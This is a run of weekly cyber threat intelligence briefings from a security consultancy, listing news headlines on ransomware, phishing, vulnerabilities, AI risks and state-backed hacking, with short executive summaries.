Laptop Farm: What It Is & How It's Used, Explained

Foreign adversaries are trying to weaponize open-source software, report finds - Nextgov/FCW

How not to hire a North Korean IT spy | CSO Online

Tools and Controls

Cyber Insurance Premiums Are Soaring — And So Are Your Risks - Above the Law

AI can write your code, but nearly half of it may be insecure - Help Net Security

New EDR killer tool used by eight different ransomware groups

75 percent of cybersecurity leaders don’t trust their own data - BetaNews

'A disaster waiting to happen' — Cybersecurity experts react to UK age verification law | Tom's Guide

One Week of the Online Safety Act: Cyber Experts Weigh In - IT Security Guru

Why do angry UK internet users want to repeal the Online Safety Act? Here are the 5 biggest complaints | TechRadar

Social media battles and barbs on both sides of Atlantic over UK Online Safety Act | Internet safety | The Guardian

Privilege Escalation Issue in Amazon ECS Leads to IAM Hijacking

UK cyber resilience crisis deepens as SMBs struggle with alert overload, cloud blind spots and insider threats, reveals TrustLayer | Pressat

Ransomware goes cloud native to target your backup infrastructure | CSO Online

Exposed Without a Breach: The Cost of Data Blindness

Sex toy maker Lovense threatens legal action after fixing security flaws that exposed users' data | TechCrunch

The humble printer highlights overlooked security flaws | CIO Dive

What's keeping risk leaders up at night? AI, tariffs, and cost cuts - Help Net Security

Fraud controls don’t guarantee consumer trust - Help Net Security

Akira ransomware abuses CPU tuning tool to disable Microsoft Defender

Mind the overconfidence gap: CISOs and staff don’t see eye to eye on security posture | CSO Online

CISOs say they're prepared, their data says otherwise - Help Net Security

Misconfigurations Are Not Vulnerabilities: The Costly Confusion Behind Security Risks

Vibe Coding: When Everyone’s a Developer, Who Secures the Code? - SecurityWeek

China’s botched Great Firewall upgrade invites attacks • The Register

Cybersecurity Incident Response Needs A War Room, Not A Playbook

Yes, you need a firewall on Linux - here's why and which to use | ZDNET

Reports Published in the Last Week

Cost of a data breach 2025 | IBM

Other News

Man-in-the-Middle Attack Prevention Guide

MacOS Under Attack: How Organizations Can Counter Rising Threats

Strengthening the UK's data center infrastructure | TechRadar

Councils are the weak link in UK cyber defences

Cyberattacks Making Consumers More Cautious About Online Shopping

Energy companies are blind to thousands of exposed services - Help Net Security

UK Boosts Cybersecurity Budget to Shield Critical Infrastructure

UK Ministry of Defence to bolster troops’ cyber skills | Cybernews

Monaco fights back after cybercriminals target national icons - NEWS.MC - Monaco News

Why blow up satellites when you can just hack them? • The Register

Vulnerability Management

Akira and Lynx Ransomware Attacking Managed Service Providers With Stolen Login Credential and Vulnerabilities

Ransomware is up, zero-days are booming, and your IP camera might be next - Help Net Security

The Critical Flaw in CVE Scoring

Exposed Without a Breach: The Cost of Data Blindness

Misconfigurations Are Not Vulnerabilities: The Costly Confusion Behind Security Risks

AI Beats Hackers to a Zero-Day Cybersecurity Discovery, Twice

Microsoft’s Update Mistake—45% Of All Windows Users Now At Risk

US Agencies Fail IT Security Audits, Jeopardizing National Security

Vulnerabilities

New Microsoft Exchange Vulnerability Puts Hybrid Cloud Environments at Risk- Infosecurity Magazine

Akira Ransomware Exploits SonicWall VPNs in Likely Zero-Day Attack on Fully-Patched Devices

Google fixed two Qualcomm bugs that were actively exploited in the wild

Android's August 2025 Update Patches Exploited Qualcomm Vulnerability - SecurityWeek

Enterprise Secrets Exposed by CyberArk Conjur Vulnerabilities - SecurityWeek

Microsoft flaw ‘opens the door’ for hackers. It will be hard to close | World Business | postguam.com

Google addresses six vulnerabilities in August’s Android security update | CyberScoop

CISA releases malware analysis for Sharepoint Server attack • The Register

Ransomware gangs join attacks targeting Microsoft SharePoint servers

Apple iOS 18.6 Update Patches 29 Security Flaws, Fixes Exploited WebKit Bug

Adobe issues emergency fixes for AEM Forms zero-days after PoCs released

Millions of Dell PCs with Broadcom chips open to attack • The Register

Microsoft Releases Guidance on High-Severity Vulnerability (CVE-2025-53786) in Hybrid Exchange Deployments | CISA

New Ghost Calls tactic abuses Zoom and Microsoft Teams for C2 operations

RCE Flaw in AI Coding Tool Poses Software Supply Chain Risk

Vibe coding tool Cursor allows persistent code execution • The Register

Trend Micro fixes two actively exploited Apex One RCE flaws

SonicWall: Attackers did not exploit zero-day vulnerability to compromise Gen 7 firewalls - Help Net Security

Akira ransomware abuses CPU tuning tool to disable Microsoft Defender

Proton fixes Authenticator bug leaking TOTP secrets in logs

Critical Vulnerabilities Found in NVIDIA's Triton Inference Server - Infosecurity Magazine

Adobe Issues Out-of-Band Patches for AEM Forms Vulnerabilities With Public PoC - SecurityWeek

Microsoft caught in crossfire of U.S.-China cyber war - Cryptopolitan

China: US spies used Microsoft Exchange 0-day to steal info • The Register

Nvidia Patches Critical RCE Vulnerability Chain

CISA Adds 3 D-Link Vulnerabilities to KEV Catalog Amid Active Exploitation Evidence

Lovense Security Bugs Fixed | SC Media UK

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 03/08/2025 Black Arrow Admin 03/08/2025

Black Arrow Cyber Threat Intelligence Briefing 01 August 2025

Black Arrow Cyber Threat Intelligence Briefing 01 August 2025:

-HR Documents Appear in 82% of All Data Breaches

-Scattered Spider Ransomware Group Infiltrating Slack and Microsoft Teams to Target Vulnerable Employees

-Gen Z Falls for Scams 2x More Than Older Generations

-Millions Hit in Quishing Attacks as Malicious QR Codes Surge

-Ransomware Attacks Escalate to Physical Threats Against Executives

-Ransomware Up 179%, Credential Theft Up 800%: 2025’s Cyber Threat Landscape Intensifies

-New Chaos Ransomware Emerges, Launches Wave of Attacks

-Seychelles Commercial Bank Reported Cyber Security Incident

-Third of Exploited Vulnerabilities Weaponised Within a Day of Disclosure

-Sam Altman Warns That AI Is About to Cause a Massive "Fraud Crisis" in Which Anyone Can Perfectly Imitate Anyone Else

-Getting a Cyber Security Vibe Check on Vibe Coding

-The Growing Impact of AI and Quantum on Cyber Security

Executive Summary

Our review of specialist and general media continues to show that cyber security relies on, and affects, people, especially employees. Groups such as Scattered Spider exploit workplace platforms like Teams to deceive employees, and Gen Z are twice as likely to fall for attacks. QR code-based scams (Quishing) are also increasing, and research shows over 80% of data breaches involve HR documents.

Ransomware remains a serious threat, often enabled by employee actions or insecure systems. Around 40% of incidents include threats of physical harm, and a new ransomware group is targeting multiple countries using techniques including voice phishing. Other attacks continue to cause disruption; for example, Seychelles Commercial Bank suspended internet banking following a cyber incident that led to leaked data.

Technology remains essential. A report highlights the importance of keeping systems updated and maintaining strong detection and response capabilities. Many exploited vulnerabilities are old, yet a third are exploited within a day of disclosure. Looking ahead, AI and quantum computing present emerging risks that must be addressed now.

Our guidance remains unchanged. Awareness and strong controls across people, operations and technology are essential. Employees must be recognised as central to both your cyber risk and resilience.

Governance, Risk and Compliance

The CISO’s challenge: Getting colleagues to understand what you do | CSO Online

3 Things CFOs Need to Know About Mitigating Threats

Taming Cyber Reporting Pressures

Four ways companies can align their legal, HR, and security teams | SC Media

Security pros drowning in threat-intel data • The Register

Threats

Ransomware, Extortion and Destructive Attacks

The Scattered Spider hacker group is infiltrating Slack and Microsoft Teams to target vulnerable employees | IT Pro

Ransomware up 179%, credential theft up 800%: 2025’s cyber onslaught intensifies | CSO Online

After BlackSuit is taken down, new ransomware group Chaos emerges - Ars Technica

New Chaos Ransomware Emerges, Launches Wave of Attacks - Infosecurity Magazine

Ransomware will thrive until we change our strategy - Help Net Security

75% of UK Businesses Would Break a Ransomware Payment Ban to Save Their Company, Risking Criminal Charges

Ransomware is on the rise, thanks in part to GenAI - Verdict

Ransomware Attacks Escalate to Physical Threats Against Executives - Infosecurity Magazine

'I am afraid of what's next,' ex-ransomware negotiator says • The Register

Scattered Spider is running a VMware ESXi hacking spree

Scattered Spider Hacker Arrests Halt Attacks, But Copycat Threats Sustain Security Pressure

The State of Ransomware – Q2 2025 - Check Point Research

Qilin Ransomware Gain Traction Following Legal Assistance Option for Ransomware Affiliates

Ransomware Payment Bans: Prevention Strategy or Misguided Policy? - IT Security Guru

New UK ransomware rules could affect payments firms

Ransomware upstart Gunra goes cross-platform with encryption upgrades | CSO Online

Cyber criminals ‘Spooked’ After Scattered Spider Arrests - Infosecurity Magazine

Ransomware groups are blurring the line between cybercrime and ‘hacktivism’ - The Economic Times

Ransomware attacks in education jump 23% year over year | Higher Ed Dive

Ransomware ban won't save councils or NHS without urgent cyber investment

FunkSec Ransomware Decryptor Released Free to Public After Group Goes Dormant

Cyberpolice neutralizes international hacker group BlackSuit, which was engaged in extortion / The New Voice of Ukraine

Ransomware Victims

Insurance won't cover $5M in City of Hamilton claims for cyber attack, citing lack of log-in security | CBC News

NHS provider nears collapse a year after cyberattack • The Register

NASCAR Confirms Personal Information Stolen in Ransomware Attack - SecurityWeek

SafePay ransomware threatens to leak 3.5TB of Ingram Micro data

Why is the National Guard deployed for Minnesota cyberattack? | Stars and Stripes

RTÉ investigating potential cyber security incident – The Irish Times

Minnesota activates National Guard after St. Paul cyberattack

Phishing & Email Based Attacks

Millions hit in quishing attacks as malicious QR codes surge — how to stay safe | Tom's Guide

Attackers Exploit M365 for Internal Phishing | Proofpoint US

Gen Z Falls for Scams 2x More Than Older Generations

Got a suspicious Amazon refund text? Don't click the link - it's a scam | ZDNET

Email Payment Scams: Assume the Worst | Williams Mullen - JDSupra

Cyber attacks target email accounts of senior journalists - Press Gazette

Phishing Scams Hit Aviation Execs, Causing Six-Figure BEC Losses

How attackers are still phishing "phishing-resistant" authentication

2025 Email Threats: AI Phishing Demands Multi-Layered Defences

Business Email Compromise (BEC)/Email Account Compromise (EAC)

Email Payment Scams: Assume the Worst | Williams Mullen - JDSupra

Phishing Scams Hit Aviation Execs, Causing Six-Figure BEC Losses

Other Social Engineering

Millions hit in quishing attacks as malicious QR codes surge — how to stay safe | Tom's Guide

Gen Z Falls for Scams 2x More Than Older Generations

Inside a Real Clickfix Attack: How This Social Engineering Hack Unfolds

QR Code Quishing Scams Surge 50%: Tips to Protect Your Data

N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto

Top spy laments LinkedIn profiles that reveal defence work • The Register

Foreign spies are targeting defence employees working on Aukus, Asio boss reveals | Australian intelligence agencies | The Guardian

Fraud, Scams and Financial Crime

Gen Z Falls for Scams 2x More Than Older Generations

I'm a cyber security CEO who advises over 9,000 agencies and Sam Altman is wrong that the AI fraud crisis is coming—it’s already here | Fortune

Email Payment Scams: Assume the Worst | Williams Mullen - JDSupra

Got a suspicious Amazon refund text? Don't click the link - it's a scam | ZDNET

11,500 UK companies struck off Companies House register after crackdown - National Crime Agency

Sam Altman Warns That AI Is About to Cause a Massive "Fraud Crisis" in Which Anyone Can Perfectly Imitate Anyone Else

Scammers Now Using Google Forms To Hunt Crypto Victims

Who’s Really Behind the Mask? Combatting Identity Fraud - SecurityWeek

Even Scammers Are Turning To AI To Negotiate With Victims

Thai-Cambodian conflict partly provoked by cyber-scams • The Register

Pew: Three quarters of Americans targeted weekly in online scams - UPI.com

Russian soldiers scammed and robbed of war cash on return from Ukraine - BBC News

Artificial Intelligence

I'm a cybersecurity CEO who advises over 9,000 agencies and Sam Altman is wrong that the AI fraud crisis is coming—it’s already here | Fortune

Ransomware is on the rise, thanks in part to GenAI - Verdict

Getting a Cyber Security Vibe Check on Vibe Coding

Sam Altman Warns That AI Is About to Cause a Massive "Fraud Crisis" in Which Anyone Can Perfectly Imitate Anyone Else

Even Scammers Are Turning To AI To Negotiate With Victims

Overcoming Risks from Chinese GenAI Tool Usage

From Ex Machina to Exfiltration: When AI Gets Too Curious - SecurityWeek

AI is here, security still isn’t - Help Net Security

Think DDoS attacks are bad now? Wait until hackers start using AI assistants to coordinate attacks, researchers warn | IT Pro

Azure AI Speech needs seconds of audio to clone voices • The Register

The Growing Impact Of AI And Quantum On Cyber Security

Microsoft Copilot Rooted to Gain Unauthorized Root Access to its Backend System

Microsoft wants you to chat with its browser now - but can you trust this Copilot? | ZDNET

Researchers tested over 100 leading AI models on coding tasks — nearly half produced glaring security flaws | IT Pro

Browser Extensions Pose Serious Threat to Gen-AI Tools Handling Sensitive Data - SecurityWeek

Not just YouTube: Google is using AI to guess your age based on your activity - everywhere | ZDNET

AI-Generated Linux Miner 'Koske' Beats Human Malware

OWASP Launches Agentic AI Security Guidance - Infosecurity Magazine

British 999 caller's voice cloned by Russian network using AI - BBC News

2FA/MFA

Insurance won't cover $5M in City of Hamilton claims for cyberattack, citing lack of log-in security | CBC News

Malware

Sophisticated Shuyal Stealer Targets 19 Browsers

AI-Generated Linux Miner 'Koske' Beats Human Malware

Hackers Exploit SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware

Russian Intelligence blamed for malware tool

Over 200 Malicious Open Source Packages Traced to Lazarus Campaign - Infosecurity Magazine

Report Links Chinese Companies to Tools Used by State-Sponsored Hackers - SecurityWeek

Hafnium Tied to Advanced Chinese Surveillance Tools - Infosecurity Magazine

Major new malware strain targets crypto users via malicious ads - here's what we know, and how to stay safe | TechRadar

N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto

North Korean hackers continue targeting developers in open source malware campaign - and experts say as many as 36,000 victims have been snared so far | IT Pro

Hackers Breach Toptal GitHub, Publish 10 Malicious npm Packages With 5,000 Downloads

Do Macs Get Viruses? How to Scan for a Mac Virus - CNET

Bots/Botnets

Secrets are leaking everywhere, and bots are to blame - Help Net Security

Mobile

ToxicPanda Android Banking Malware Infected 4500+ Devices to Steal Banking Credentials

Android Malware Targets Banking Users Through Discord Channels - Infosecurity Magazine

Denial of Service/DoS/DDoS

Think DDoS attacks are bad now? Wait until hackers start using AI assistants to coordinate attacks, researchers warn | IT Pro

DDoS-protection crisis looms as attacks grow – Computerworld

Internet of Things – IoT

Unpatched flaw in EoL LG LNV5110R cameras lets hackers gain Admin access

Data Breaches/Leaks

Allianz Life: Insurance giant says most US customer data stolen in cyber-attack - BBC News

Seychelles Commercial Bank Reported Cybersecurity Incident

HR documents appear in 82% of all data breaches, finds Lab 1 | UNLEASH

French telecom giant Orange discloses cyber attack

IR35 advisor Qdos confirms a data leak to techie clients • The Register

French defence firm Naval Group investigates cyber leak

How Military Devices are Slipping Through the Cracks

Hackers Allegedly Breach Nokia’s Internal Network – DataBreaches.Net

Tea Dating Advice app spills sensitive data • Graham Cluley

NASCAR Confirms Personal Information Stolen in Ransomware Attack - SecurityWeek

Lovense sex toy app flaw leaks private user email addresses

Organised Crime & Criminal Actors

The Young & the Restless: Cybercriminals Raise Concerns

Thai-Cambodian conflict partly provoked by cyber-scams • The Register

Hackers plant 4G Raspberry Pi on bank network in failed ATM heist

US Now Top Target for Dark Web Cyberthreats

A US cybercrime group is targeting banks and credit unions | American Banker

FBI opens first office in New Zealand ‘to counter China and cybercrime’ | FBI | The Guardian

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Major new malware strain targets crypto users via malicious ads - here's what we know, and how to stay safe | TechRadar

Scammers Now Using Google Forms To Hunt Crypto Victims

AI-Generated Linux Miner 'Koske' Beats Human Malware

N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto

Insider Risk and Insider Threats

What the Coinbase Breach Says About Insider Risk

Insurance

Insurance won't cover $5M in City of Hamilton claims for cyberattack, citing lack of log-in security | CBC News

Supply Chain and Third Parties

Your supply chain security strategy might be missing the biggest risk - Help Net Security

Hackers Allegedly Breach Nokia’s Internal Network – DataBreaches.Net

Cloud/SaaS

Attackers Exploit M365 for Internal Phishing | Proofpoint US

Experts Detect Multi-Layer Redirect Tactic Used to Steal Microsoft 365 Login Credentials

Microsoft exec admits it 'cannot guarantee' data sovereignty • The Register

UK to rein in Microsoft, AWS with 'strategic market status' • The Register

N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto

Microsoft investigates outage affecting Microsoft 365 admin center

Outages

Microsoft investigates outage affecting Microsoft 365 admin center

Global Starlink outage disrupts Ukrainian front lines

Musk ordered shutdown of Starlink satellite service as Ukraine retook territory from Russia | Reuters

Starlink Faces Another Brief Outage | PCMag

Why did the air traffic control outage cause so much havoc? - BBC News

Encryption

The Growing Impact Of AI And Quantum On Cybersecurity

Google says UK government has not demanded an encryption backdoor for its users' data | TechCrunch

Google confirms the UK has not asked it to weaken encryption with a backdoor – unlike Apple | TechRadar

A UK Government Order Threatens the Privacy and Security of All Internet Users - Internet Society

Linux and Open Source

Hackers Exploit SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware

Passwords, Credential Stuffing & Brute Force Attacks

Experts Detect Multi-Layer Redirect Tactic Used to Steal Microsoft 365 Login Credentials

Ransomware up 179%, credential theft up 800%: 2025’s cyber onslaught intensifies | CSO Online

Why stolen credentials remain cyber criminals’ tool of choice - Help Net Security

ToxicPanda Android Banking Malware Infected 4500+ Devices to Steal Banking Credentials

Social Media

Top spy laments LinkedIn profiles that reveal defence work • The Register

Foreign spies are targeting defence employees working on Aukus, Asio boss reveals | Australian intelligence agencies | The Guardian

Malvertising

Major new malware strain targets crypto users via malicious ads - here's what we know, and how to stay safe | TechRadar

Regulations, Fines and Legislation

The top 3 cybersecurity risks posed by the Online Safety Act and age verification | Tom's Guide

UK to rein in Microsoft, AWS with 'strategic market status' • The Register

75% of UK Businesses Would Break a Ransomware Payment Ban to Save Their Company, Risking Criminal Charges

Age verification requirements have landed in the UK – how the internet will change, and what about your privacy? | TechRadar

VPNs can get around the UK's age verification laws – but is it necessary? | Tom's Guide

UK Online Safety Act Triggers 1400% VPN Surge Amid Ban Fears

Internet age verification begins rollout, and it's as bad as you'd expect

A UK Government Order Threatens the Privacy and Security of All Internet Users - Internet Society

Ransomware ban won't save councils or NHS without urgent cyber investment

UK web surfers warned of cyber security risks following new Online Safety Act - Stoke-on-Trent Live

Suspected advanced persistent threat attacks must be reported under S’pore’s amended Cyber security Act | The Straits Times

Google confirms the UK has not asked it to weaken encryption with a backdoor – unlike Apple | TechRadar

New UK ransomware rules could affect payments firms

A Court Ruling on Bug Bounties Just Made the Internet Less Safe - Infosecurity Magazine

The Proposed EU Space Act: 10 Key Implications US and Non-EU Satellite Operators Should Know | Cooley LLP - JDSupra

Banning VPNs to protect kids? Good luck with that • The Register

Government layoffs are making us less safe in cyberspace, experts fear - Nextgov/FCW

Models, Frameworks and Standards

OWASP Launches Agentic AI Security Guidance - Infosecurity Magazine

CISA Unveils Eviction Strategies Tool to Aid Incident Response - Infosecurity Magazine

Careers, Working in Cyber and Information Security

UK cyber security workers are overworked, overwhelmed, and burning out faster than global counterparts — here's why | IT Pro

Double Whammy: When Insecure Code Meets Burned-Out Cybersecurity Teams - The Daily Upside

Cyber security professionals facing burnout as threats mount - CIR Magazine

Law Enforcement Action and Take Downs

Scattered Spider Hacker Arrests Halt Attacks, But Copycat Threats Sustain Security Pressure

Cyber criminals ‘Spooked’ After Scattered Spider Arrests - Infosecurity Magazine

Cyber police neutralizes international hacker group BlackSuit, which was engaged in extortion/The New Voice of Ukraine

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Top spy laments LinkedIn profiles that reveal defence work • The Register

Foreign spies are targeting defence employees working on Aukus, Asio boss reveals | Australian intelligence agencies | The Guardian

'Fire Ant' Cyber Spies Compromise Siloed VMware Systems

Cyber Espionage Campaign Hits Russian Aerospace Sector Using EAGLET Backdoor

Kremlin goons caught abusing local ISPs to spy on diplomats • The Register

Russia's Secret Blizzard APT Gains Embassy Access

Frozen in transit: Secret Blizzard’s AiTM campaign against diplomats | Microsoft Security Blog

US Army Building Global IT Warfighting Platform To Prepare for Cyber Warfare | AFCEA International

Non-State Cyber Actors in the 12-Day War – The Gray Zone of LOAC, Part I - Lieber Institute West Point

Nation State Actors

Microsoft’s software licensing playbook is a national security risk | CyberScoop

Suspected advanced persistent threat attacks must be reported under S’pore’s amended Cybersecurity Act | The Straits Times

China

Microsoft’s software licensing playbook is a national security risk | CyberScoop

Top spy laments LinkedIn profiles that reveal defence work • The Register

Foreign spies are targeting defence employees working on Aukus, Asio boss reveals | Australian intelligence agencies | The Guardian

Fire Ant Exploits VMware Flaws to Compromise ESXi Hosts and vCenter Environments

'Fire Ant' Cyber Spies Compromise Siloed VMware Systems

Report Links Chinese Companies to Tools Used by State-Sponsored Hackers - SecurityWeek

Hafnium Tied to Advanced Chinese Surveillance Tools - Infosecurity Magazine

Overcoming Risks from Chinese GenAI Tool Usage

Chinese Hackers Weaponizes Software Vulnerabilities to Compromise Their Targets

CISA to Release Salt Typhoon Report on Telecom Security

FBI opens first office in New Zealand ‘to counter China and cybercrime’ | FBI | The Guardian

Scoop: US intelligence intervened with DOJ to push HPE-Juniper merger

Chinese Researchers Suggest Lasers and Sabotage to Counter Musk’s Starlink Satellites - SecurityWeek

Russia

Top spy laments LinkedIn profiles that reveal defence work • The Register

Foreign spies are targeting defence employees working on Aukus, Asio boss reveals | Australian intelligence agencies | The Guardian

Kremlin goons caught abusing local ISPs to spy on diplomats • The Register

Russia's Secret Blizzard APT Gains Embassy Access

Frozen in transit: Secret Blizzard’s AiTM campaign against diplomats | Microsoft Security Blog

Russian Intelligence blamed for malware tool

Global Starlink outage disrupts Ukrainian front lines

Musk ordered shutdown of Starlink satellite service as Ukraine retook territory from Russia | Reuters

British 999 caller's voice cloned by Russian network using AI - BBC News

Ukrainian hack uncovers 'thousands of files' proving Russia's mass abduction of children, intelligence claims

Cyber Espionage Campaign Hits Russian Aerospace Sector Using EAGLET Backdoor

Russian soldiers scammed and robbed of war cash on return from Ukraine - BBC News

Pro-Ukraine Hacktivists Ground Dozens of Aeroflot Flights - Infosecurity Magazine

Cyber attack On Russian Airline Aeroflot Causes the Cancellation of More Than 100 Flights - SecurityWeek

Who is Silent Crow? Pro-Ukraine hackers take down Russian airline Aeroflot | The Independent

Cyber attack shuts down hundreds of Russian pharmacies, disrupts healthcare services | The Record from Recorded Future News

Iran

Non-State Cyber Actors in the 12-Day War – The Gray Zone of LOAC, Part I - Lieber Institute West Point

North Korea

Over 200 Malicious Open Source Packages Traced to Lazarus Campaign - Infosecurity Magazine

North Korean hackers continue targeting developers in open source malware campaign - and experts say as many as 36,000 victims have been snared so far | IT Pro

N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Ransomware groups are blurring the line between cybercrime and ‘hacktivism’ - The Economic Times

Cyber attack may have cost Russia’s Aeroflot millions of dollars in a single day, experts say — Meduza

Who is Silent Crow? Pro-Ukraine hackers take down Russian airline Aeroflot | The Independent

Tools and Controls

The top 3 cyber security risks posed by the Online Safety Act and age verification | Tom's Guide

Insurance won't cover $5M in City of Hamilton claims for cyberattack, citing lack of log-in security | CBC News

How the Browser Became the Main Cyber Battleground

Microsoft’s software licensing playbook is a national security risk | CyberScoop

Age verification requirements have landed in the UK – how the internet will change, and what about your privacy? | TechRadar

VPNs can get around the UK's age verification laws – but is it necessary? | Tom's Guide

A Court Ruling on Bug Bounties Just Made the Internet Less Safe - Infosecurity Magazine

DDoS-protection crisis looms as attacks grow – Computerworld

Getting a Cyber Security Vibe Check on Vibe Coding

Security pros drowning in threat-intel data • The Register

How to discover and manage shadow APIs | TechTarget

Another top vibe coding platform has some worrying security flaws - here's what we know | TechRadar

North Korean hackers continue targeting developers in open source malware campaign - and experts say as many as 36,000 victims have been snared so far | IT Pro

OWASP Launches Agentic AI Security Guidance - Infosecurity Magazine

UK web surfers warned of cyber security risks following new Online Safety Act - Stoke-on-Trent Live

Researchers tested over 100 leading AI models on coding tasks — nearly half produced glaring security flaws | IT Pro

Hybrid Work and Cyber Security Threats Expose Urgent Gap in Device Management, Warns Info-Tech Research Group

62% of Companies Admit to Shipping Insecure Code: Cypress Data Defence Unveils 2025 State of Application Security Report

Alert Fatigue, Data Overload, and the Fall of Traditional SIEMs

Double Whammy: When Insecure Code Meets Burned-Out Cybersecurity Teams - The Daily Upside

CISA Unveils Eviction Strategies Tool to Aid Incident Response - Infosecurity Magazine

Banning VPNs to protect kids? Good luck with that • The Register

Other News

How the Browser Became the Main Cyber Battleground

The food supply chain has a cybersecurity problem - Help Net Security

Minnesota activates National Guard after St. Paul cyberattack

Is retail a sitting duck for cybercriminals? | Retail Week

Intelligence sharing: The boost for businesses | IT Pro

World told cyber threats must be tackled

The legal minefield of hacking back - Help Net Security

The final frontier of cybersecurity is now in space - Help Net Security

Service Levels for MSSPs: Elevating Security-Specific Services | MSSP Alert

Vulnerability Management

Third of Exploited Flaws Weaponized Within a Day of Disclosure - Infosecurity Magazine

Chinese Hackers Weaponizes Software Vulnerabilities to Compromise Their Targets

Double Whammy: When Insecure Code Meets Burned-Out Cybersecurity Teams - The Daily Upside

Spikes in malicious activity precede new security flaws in 80% of cases

62% of Companies Admit to Shipping Insecure Code: Cypress Data Defence Unveils 2025 State of Application Security Report

Vulnerabilities

Exploit available for critical Cisco ISE bug exploited in attacks

More than 90 state, local governments targeted using Microsoft SharePoint vulnerability, group says | Reuters

Another top vibe coding platform has some worrying security flaws - here's what we know | TechRadar

Fire Ant Exploits VMware Flaws to Compromise ESXi Hosts and vCenter Environments

Hackers Exploit SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware

Scattered Spider is running a VMware ESXi hacking spree

Microsoft: macOS Sploitlight flaw leaks Apple Intelligence data

Apple fixed a zero-day exploited in attacks against Google Chrome users

Google Chrome 138 update fixes high security issue, early 139 stable update released - gHacks Tech News

Google Patches Vulnerability That Let Anyone Hide Search Results

Critical Flaws in WordPress Plugin Leave 10,000 Sites Vulnerable - Infosecurity Magazine

CISA flags PaperCut RCE bug as exploited in attacks, patch now

New Lenovo UEFI firmware updates fix Secure Boot bypass flaws

Hackers Exploit Critical WordPress Theme Flaw to Hijack Sites via Remote Plugin Install

Unpatched flaw in EoL LG LNV5110R cameras lets hackers gain Admin access

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 27/07/2025 Black Arrow Admin 27/07/2025

Black Arrow Cyber Threat Intelligence Briefing 25 July 2025

Black Arrow Cyber Threat Intelligence Briefing 25 July 2025:

-158-Year-Old UK Logistics Firm KNP Collapses After Ransomware Attack Exploits Employee’s Weak Password

-Hackers Fooled Cognizant Help Desk, Says Clorox in $380M Cyber Attack Lawsuit

-US Nuclear Weapons Agency ‘Among 400 Organisations Breached by Chinese Hackers’ Exploiting Microsoft SharePoint Vulnerability

-Europe Sees Cyber Attacks Surge Amid Geopolitical Tensions

-68% of Organisations Experienced Data Leakage from Employee AI Usage

-Zimperium Warns of Rising Mobile Cyber Threats Amid Summer Travel Surge

-Cyber Turbulence Ahead as Airlines Strap In for a Security Crisis

-Nearly Half of Managed Service Providers (MSPs) Have Dedicated Kitty for Ransomware Incidents

-UK Confirms Ransomware Payment Ban for Public Sector and CNI

-University Student Who Sold More than a Thousand Phishing Kits to Fraudsters is Jailed

-$15M Reward Offered as American Woman Jailed in North Korea IT Worker Scam

-UK Announces Sanctions Against Russian Cyber Units Over Threats to Europe

Executive Summary

Our review of cyber security intelligence from specialist and public media this week starts with details of three recently disclosed attacks, including an attack causing the collapse of a firm that was almost 160 years old. The attacks were attributed to weak passwords and verification controls, and in one case it was the exploit of a vulnerability in on-premises SharePoint. We share details of a warning of increased attacks during the summer travel season, and the high percentage of organisations suffering data leakage when employees use AI tools often in an unauthorised manner.

We report on a survey that found almost half of IT managed service providers have funds allocated for paying ransoms, while the UK government has banned public sector and critical national infrastructure organisations from paying ransoms. We include reports of increased attacks in the airline sector, and more widely across Europe as a result of the geopolitical landscape. We also include news of successful legal action against cyber attackers including a student who sold phishing kits, and a US citizen who was helping North Koreans to infiltrate organisations as fake IT workers, as well as UK government sanctions against attackers in the Russian military.

Governance, Risk and Compliance

Most cyber risks driven by few employees, study shows | SC Media

How AI is changing the GRC strategy | CSO Online

Threats

Ransomware, Extortion and Destructive Attacks

UK Confirms Ransomware Payment Ban for Public Sector and CNI - Infosecurity Magazine

UK moves forward with plans for mandatory reporting of ransomware attacks | The Record from Recorded Future News

Marks & Spencer’s cyber attack isn’t an exception - it’s a warning | TechRadar

Nearly Half of MSPs Have Dedicated Kitty For Ransomware Incidents - IT Security Guru

SharePoint victim count hits 400+ orgs in ongoing attacks • The Register

Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit

